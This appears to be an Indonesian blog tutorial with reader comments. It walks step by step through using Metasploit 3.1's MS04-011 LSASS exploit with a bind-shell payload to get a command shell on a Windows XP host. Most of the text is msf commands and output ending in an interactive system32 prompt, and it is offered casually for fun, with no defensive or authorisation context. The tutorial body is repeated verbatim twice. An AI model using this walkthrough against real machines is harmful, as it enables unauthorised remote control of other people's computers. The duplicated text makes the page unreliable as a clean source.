nich..cara2nya...pk metasploit framework-3.1
1. Jalanin programnya...
2. truz..teken tombol CTRL+O bwat masuk ke konsolnya..
3. maka akan muncul konsol spt ini
_
| | o
_ _ _ _ _|_ __, , _ | | __ _|_
/ |/ |/ | |/ | / | / \_|/ \_|/ / \_| |
| | |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
/|
\|
=[ msf v3.1-release
+ -- --=[ 262 exploits - 117 payloads
+ -- --=[ 17 encoders - 6 nops
=[ 46 aux
msf >
4. liat smua exploit yg ada...(tuk iseng doank)
msf > show exploits
5. load modul exploit, qta gunain exploit lsass spt cara diatas
msf > use windows/smb/ms04_011_lsass
6. Tentukan sistem operasi target... misal target menggunakan XP
maka targetnya spt berikut
msf exploit(ms04_011_lsass) > set target 2
target => 2
7. Tampilin payloadnya apa aja yg ada..
msf exploit(ms04_011_lsass) > show payloads
8. karena qta mo msk k konsol, qta plh payload generic/shell_bind_tcp
msf exploit(ms04_011_lsass) > set payload generic/shell_bind_tcp
payload => generic/shell_bind_tcp
9. Udah ntuh tentuin IP si target...misal ip si target 192.168.113.14
msf exploit(ms04_011_lsass) > set RHOST 192.168.113.14
RHOST => 192.168.113.14
10. Udah dech...tinggal jalanin perintah exploit...
msf exploit(ms04_011_lsass) > exploit
[*] Started bind handler
[*] Binding to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.113.14[\lsarpc]...
[*] Bound to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.113.14[\lsarpc]...
[*] Getting OS information...
[*] Trying to exploit Windows 5.1
[*] Command shell session 3 opened (192.168.113.25:8471 -> 192.168.113.14:4444)
[*] The DCERPC service did not reply to our request
lihat di sana ada tulisan Command shell session 3 opened...ini menandakan qta sudah berhasil msk...dan shell qta di simpan di session 3.
11. Selanjutnya qta tampilin...isi session qta
msf exploit(ms04_011_lsass) > sessions -l
Active sessions
===============
Id Description Tunnel
-- ----------- ------
3 Command shell 192.168.113.25:8471 -> 192.168.113.14:4444
12. Udah itu...kita masuk ke session 3 tersebut, untuk masuk ke konsol....
msf exploit(ms04_011_lsass) > sessions -i 3
[*] Starting interaction with 3...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
1. Jalanin programnya...
2. truz..teken tombol CTRL+O bwat masuk ke konsolnya..
3. maka akan muncul konsol spt ini
_
| | o
_ _ _ _ _|_ __, , _ | | __ _|_
/ |/ |/ | |/ | / | / \_|/ \_|/ / \_| |
| | |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
/|
\|
=[ msf v3.1-release
+ -- --=[ 262 exploits - 117 payloads
+ -- --=[ 17 encoders - 6 nops
=[ 46 aux
msf >
4. liat smua exploit yg ada...(tuk iseng doank)
msf > show exploits
5. load modul exploit, qta gunain exploit lsass spt cara diatas
msf > use windows/smb/ms04_011_lsass
6. Tentukan sistem operasi target... misal target menggunakan XP
maka targetnya spt berikut
msf exploit(ms04_011_lsass) > set target 2
target => 2
7. Tampilin payloadnya apa aja yg ada..
msf exploit(ms04_011_lsass) > show payloads
8. karena qta mo msk k konsol, qta plh payload generic/shell_bind_tcp
msf exploit(ms04_011_lsass) > set payload generic/shell_bind_tcp
payload => generic/shell_bind_tcp
9. Udah ntuh tentuin IP si target...misal ip si target 192.168.113.14
msf exploit(ms04_011_lsass) > set RHOST 192.168.113.14
RHOST => 192.168.113.14
10. Udah dech...tinggal jalanin perintah exploit...
msf exploit(ms04_011_lsass) > exploit
[*] Started bind handler
[*] Binding to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.113.14[\lsarpc]...
[*] Bound to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.113.14[\lsarpc]...
[*] Getting OS information...
[*] Trying to exploit Windows 5.1
[*] Command shell session 3 opened (192.168.113.25:8471 -> 192.168.113.14:4444)
[*] The DCERPC service did not reply to our request
lihat di sana ada tulisan Command shell session 3 opened...ini menandakan qta sudah berhasil msk...dan shell qta di simpan di session 3.
11. Selanjutnya qta tampilin...isi session qta
msf exploit(ms04_011_lsass) > sessions -l
Active sessions
===============
Id Description Tunnel
-- ----------- ------
3 Command shell 192.168.113.25:8471 -> 192.168.113.14:4444
12. Udah itu...kita masuk ke session 3 tersebut, untuk masuk ke konsol....
msf exploit(ms04_011_lsass) > sessions -i 3
[*] Starting interaction with 3...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
gan...
ReplyDeleteseason nya gk mau muncul nih,,
tolong kasih tutorial video nya ajjz gann??
pliieesszz
@abdul ghonie : ntr saya bikinin videonya gan kapan"..
ReplyDelete